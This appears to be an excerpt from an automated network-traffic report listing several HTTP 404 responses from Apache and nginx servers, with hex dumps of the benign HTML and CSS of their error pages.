            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Sep 2024 07:36:59 GMTServer: ApacheContent-Length: 13840Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 6c 65 66 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 31 35 30 70 78 20 31 35 36 70 78 3b 0a 7d 0a 0a 2e 72 69 67 
68 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 33 31 30 70 78 20 31 35 30 70 78 3b 0a 7d 0a 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 40 6b 65 79 66 72 61 6d 65 73 20 73 63 61 6c 65 73 7b 0a 20 20 66 72 6f 6d 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 30 2e 39 38 29 7d 0a 20 20 74 6f 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 31 29 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 72 6f 74 61 74 65 70 61 6f 7b 0a 20 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74 65 28 30 64 65 67 29 7d 0a 20 20 35 30 25 20 2c 20 36 30 25 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Sep 2024 07:37:01 GMTServer: ApacheContent-Length: 13840Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 6c 65 66 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 31 35 30 70 78 20 31 35 36 70 78 3b 0a 7d 0a 0a 2e 72 69 67 
68 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 33 31 30 70 78 20 31 35 30 70 78 3b 0a 7d 0a 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 40 6b 65 79 66 72 61 6d 65 73 20 73 63 61 6c 65 73 7b 0a 20 20 66 72 6f 6d 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 30 2e 39 38 29 7d 0a 20 20 74 6f 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 31 29 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 72 6f 74 61 74 65 70 61 6f 7b 0a 20 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74 65 28 30 64 65 67 29 7d 0a 20 20 35 30 25 20 2c 20 36 30 25 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Sep 2024 07:37:04 GMTServer: ApacheContent-Length: 13840Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 6c 65 66 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 31 35 30 70 78 20 31 35 36 70 78 3b 0a 7d 0a 
0a 2e 72 69 67 68 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 33 31 30 70 78 20 31 35 30 70 78 3b 0a 7d 0a 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 40 6b 65 79 66 72 61 6d 65 73 20 73 63 61 6c 65 73 7b 0a 20 20 66 72 6f 6d 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 30 2e 39 38 29 7d 0a 20 20 74 6f 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 31 29 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 72 6f 74 61 74 65 70 61 6f 7b 0a 20 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74 65 28 30 64 65 67 29 7d 0a 20 20 35 30 25 20 2c 20 36 30 25 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 04 Sep 2024 07:37:24 GMTContent-Type: text/htmlContent-Length: 3971Connection: closeETag: "6526681e-f83"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 
20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 04 Sep 2024 07:37:27 GMTContent-Type: text/htmlContent-Length: 3971Connection: closeETag: "6526681e-f83"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 
20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 04 Sep 2024 07:37:29 GMTContent-Type: text/htmlContent-Length: 3971Connection: closeETag: "6526681e-f83"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 
20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 04 Sep 2024 07:37:29 GMTContent-Type: text/htmlContent-Length: 3971Connection: closeETag: "6526681e-f83"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 